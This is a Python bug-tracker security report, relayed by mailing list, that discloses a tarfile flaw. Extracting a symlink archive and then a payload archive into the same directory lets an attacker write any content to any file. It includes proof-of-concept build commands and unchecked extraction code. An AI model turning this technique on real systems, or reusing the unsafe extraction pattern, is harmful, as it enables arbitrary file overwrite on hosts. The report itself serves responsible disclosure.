New submission from guangli dong <leve...@gmail.com>:
if uncompress file twice to the same dir, attacker can "write any content to
any file on the host"".
poc code like below:
```
import tarfile
dir_name = "/tmp/anything"
file1_name = "/tmp/a.tar.gz" # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz
test_tar/a
file2_name = "/tmp/b.tar.gz" # echo "it is just poc" > /tmp/payload; rm -rf
test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a
def vuln_tar(tar_path):
"""
:param tar_path:
:return:
"""
import tarfile
tar = tarfile.open(tar_path, "r:tar")
file_names = tar.getnames()
for file_name in file_names:
tar.extract(file_name, dir_name)
tar.close()
vuln_tar(file1_name)
vuln_tar(file2_name)
```
in this poc code, if one service uncompress tar file which is uploaded by
attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is
just poc" string into "/tmp/a" file.
----------
components: Library (Lib)
files: poc.tar.gz
messages: 392827
nosy: leveryd
priority: normal
severity: normal
status: open
title: "tarfile" library will lead to "write any content to any file on the
host".
type: security
versions: Python 3.7
Added file: https://bugs.python.org/file50005/poc.tar.gz
_______________________________________
Python tracker <rep...@bugs.python.org>
<https://bugs.python.org/issue44023>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
